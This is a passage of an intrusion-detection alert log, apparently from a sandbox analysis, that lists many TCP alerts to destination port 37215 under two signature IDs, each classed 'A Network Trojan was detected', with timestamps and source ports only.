          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743496
          SID:2829579
          Source Port:46236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708852
          SID:2829579
          Source Port:46736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764633
          SID:2835222
          Source Port:34496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126807
          SID:2835222
          Source Port:60136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.734773
          SID:2835222
          Source Port:42602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093776
          SID:2829579
          Source Port:44582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.731953
          SID:2835222
          Source Port:33502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.865402
          SID:2829579
          Source Port:40880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125684
          SID:2829579
          Source Port:46426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044542
          SID:2835222
          Source Port:37470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.689031
          SID:2829579
          Source Port:60808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.477929
          SID:2835222
          Source Port:42030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591392
          SID:2829579
          Source Port:60010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334169
          SID:2835222
          Source Port:58312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743716
          SID:2829579
          Source Port:51712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559760
          SID:2835222
          Source Port:47870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216388
          SID:2835222
          Source Port:36656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.774277
          SID:2835222
          Source Port:37142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176499
          SID:2835222
          Source Port:46714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486720
          SID:2835222
          Source Port:38804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147481
          SID:2829579
          Source Port:47468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217304
          SID:2835222
          Source Port:36828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861557
          SID:2835222
          Source Port:38392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185632
          SID:2835222
          Source Port:53766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402127
          SID:2835222
          Source Port:59020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652867
          SID:2835222
          Source Port:38528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326122
          SID:2829579
          Source Port:48780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.361573
          SID:2829579
          Source Port:56230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287880
          SID:2829579
          Source Port:53252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.731133
          SID:2835222
          Source Port:37868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795229
          SID:2829579
          Source Port:51812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170329
          SID:2829579
          Source Port:37576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.248028
          SID:2835222
          Source Port:41778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222430
          SID:2835222
          Source Port:41210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722044
          SID:2829579
          Source Port:57436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033971
          SID:2829579
          Source Port:36562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932746
          SID:2829579
          Source Port:60030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.069528
          SID:2829579
          Source Port:47596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124650
          SID:2835222
          Source Port:52692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959672
          SID:2835222
          Source Port:54830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.284917
          SID:2829579
          Source Port:57778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185754
          SID:2835222
          Source Port:55210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551594
          SID:2835222
          Source Port:57830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213991
          SID:2829579
          Source Port:49894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977900
          SID:2829579
          Source Port:34112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.285451
          SID:2835222
          Source Port:34148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491279
          SID:2835222
          Source Port:42844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202204
          SID:2829579
          Source Port:41292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496763
          SID:2829579
          Source Port:43338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744706
          SID:2829579
          Source Port:59078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975201
          SID:2835222
          Source Port:34732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112815
          SID:2829579
          Source Port:60446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190457
          SID:2829579
          Source Port:57854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549328
          SID:2835222
          Source Port:56328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923500
          SID:2835222
          Source Port:38720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671771
          SID:2829579
          Source Port:37294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530033
          SID:2829579
          Source Port:47610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959034
          SID:2835222
          Source Port:58962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.316616
          SID:2835222
          Source Port:52670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472100
          SID:2835222
          Source Port:57558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487987
          SID:2829579
          Source Port:56668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613892
          SID:2829579
          Source Port:40534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.683328
          SID:2835222
          Source Port:53078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988984
          SID:2829579
          Source Port:46938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730314
          SID:2835222
          Source Port:60390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.085531
          SID:2835222
          Source Port:45728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431411
          SID:2835222
          Source Port:45304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724881
          SID:2829579
          Source Port:43980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.913546
          SID:2829579
          Source Port:57924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726651
          SID:2835222
          Source Port:52118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117123
          SID:2829579
          Source Port:57320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205314
          SID:2835222
          Source Port:41102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466461
          SID:2829579
          Source Port:46850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266586
          SID:2829579
          Source Port:35462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889853
          SID:2829579
          Source Port:34472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299870
          SID:2829579
          Source Port:53998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202962
          SID:2835222
          Source Port:44416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846874
          SID:2829579
          Source Port:50418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.486544
          SID:2835222
          Source Port:49270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656235
          SID:2835222
          Source Port:48186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123859
          SID:2829579
          Source Port:49018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208298
          SID:2829579
          Source Port:60646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272339
          SID:2829579
          Source Port:38084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635201
          SID:2835222
          Source Port:35098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876444
          SID:2835222
          Source Port:45032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.284977
          SID:2835222
          Source Port:60964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.913860
          SID:2835222
          Source Port:47946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680319
          SID:2835222
          Source Port:50466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480322
          SID:2835222
          Source Port:40610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298286
          SID:2829579
          Source Port:41268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269323
          SID:2829579
          Source Port:59476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689855
          SID:2835222
          Source Port:50978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480775
          SID:2835222
          Source Port:54496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756008
          SID:2829579
          Source Port:52654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475901
          SID:2835222
          Source Port:55364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914191
          SID:2829579
          Source Port:52832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593189
          SID:2829579
          Source Port:49028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840505
          SID:2835222
          Source Port:46244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597726
          SID:2829579
          Source Port:45722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271196
          SID:2835222
          Source Port:36874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.715256
          SID:2835222
          Source Port:40014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939537
          SID:2835222
          Source Port:33172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891759
          SID:2835222
          Source Port:44926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.626433
          SID:2829579
          Source Port:46512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462119
          SID:2835222
          Source Port:52632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144993
          SID:2829579
          Source Port:57068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196035
          SID:2835222
          Source Port:47646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892732
          SID:2835222
          Source Port:44320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594277
          SID:2829579
          Source Port:50134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116912
          SID:2829579
          Source Port:36514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202944
          SID:2829579
          Source Port:39698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.995702
          SID:2835222
          Source Port:44462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548704
          SID:2829579
          Source Port:56254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680133
          SID:2829579
          Source Port:52720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297460
          SID:2835222
          Source Port:51148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143809
          SID:2835222
          Source Port:48836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.619361
          SID:2835222
          Source Port:49640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105701
          SID:2835222
          Source Port:42214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652296
          SID:2835222
          Source Port:33878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.859124
          SID:2835222
          Source Port:47694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209356
          SID:2835222
          Source Port:51000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232970
          SID:2829579
          Source Port:54026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727993
          SID:2835222
          Source Port:42722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.355711
          SID:2829579
          Source Port:35356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845807
          SID:2829579
          Source Port:55826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188959
          SID:2835222
          Source Port:55630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.077628
          SID:2835222
          Source Port:54158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932770
          SID:2835222
          Source Port:36314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.857332
          SID:2829579
          Source Port:38520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711274
          SID:2829579
          Source Port:41476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322913
          SID:2829579
          Source Port:57496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590852
          SID:2829579
          Source Port:36798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548002
          SID:2829579
          Source Port:33762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923028
          SID:2835222
          Source Port:50774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.660401
          SID:2829579
          Source Port:51762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941628
          SID:2829579
          Source Port:37670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652801
          SID:2835222
          Source Port:37934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.774203
          SID:2829579
          Source Port:45494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.321023
          SID:2835222
          Source Port:39724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.926646
          SID:2835222
          Source Port:41276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772046
          SID:2829579
          Source Port:45714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593259
          SID:2835222
          Source Port:51588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939301
          SID:2835222
          Source Port:36028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745936
          SID:2829579
          Source Port:44000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207894
          SID:2835222
          Source Port:33660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.932634
          SID:2829579
          Source Port:36256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797200
          SID:2835222
          Source Port:58720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.214012
          SID:2835222
          Source Port:35410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953536
          SID:2829579
          Source Port:46334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270626
          SID:2835222
          Source Port:40388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.859193
          SID:2829579
          Source Port:52912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861134
          SID:2829579
          Source Port:54300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766143
          SID:2835222
          Source Port:57168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441321
          SID:2835222
          Source Port:52250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664503
          SID:2829579
          Source Port:55554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.738504
          SID:2835222
          Source Port:56794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932713
          SID:2829579
          Source Port:49066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927746
          SID:2835222
          Source Port:39476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.818263
          SID:2829579
          Source Port:51298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561870
          SID:2829579
          Source Port:59838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739719
          SID:2829579
          Source Port:51694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.739077
          SID:2829579
          Source Port:56710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090417
          SID:2829579
          Source Port:53080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592900
          SID:2829579
          Source Port:60106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205561
          SID:2835222
          Source Port:42010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145306
          SID:2835222
          Source Port:39054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497101
          SID:2835222
          Source Port:51038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481347
          SID:2829579
          Source Port:54748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.608844
          SID:2829579
          Source Port:59064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992869
          SID:2829579
          Source Port:45850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890073
          SID:2829579
          Source Port:51996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399324
          SID:2829579
          Source Port:56990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268670
          SID:2835222
          Source Port:52346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650311
          SID:2829579
          Source Port:55342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337993
          SID:2829579
          Source Port:33762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.416040
          SID:2829579
          Source Port:53568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173034
          SID:2835222
          Source Port:49654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.811304
          SID:2829579
          Source Port:37578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979352
          SID:2829579
          Source Port:58454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.301023
          SID:2829579
          Source Port:43696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.613738
          SID:2835222
          Source Port:57230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960726
          SID:2829579
          Source Port:39596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273196
          SID:2829579
          Source Port:53608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651161
          SID:2835222
          Source Port:49924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402260
          SID:2835222
          Source Port:33342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482988
          SID:2829579
          Source Port:33876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669309
          SID:2829579
          Source Port:53566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401045
          SID:2835222
          Source Port:57278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864507
          SID:2835222
          Source Port:54896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.247145
          SID:2835222
          Source Port:32940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842840
          SID:2829579
          Source Port:40184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042452
          SID:2835222
          Source Port:35674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710986
          SID:2829579
          Source Port:57412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.628453
          SID:2829579
          Source Port:35628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552134
          SID:2835222
          Source Port:52466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.067716
          SID:2835222
          Source Port:39218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711323
          SID:2835222
          Source Port:54516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
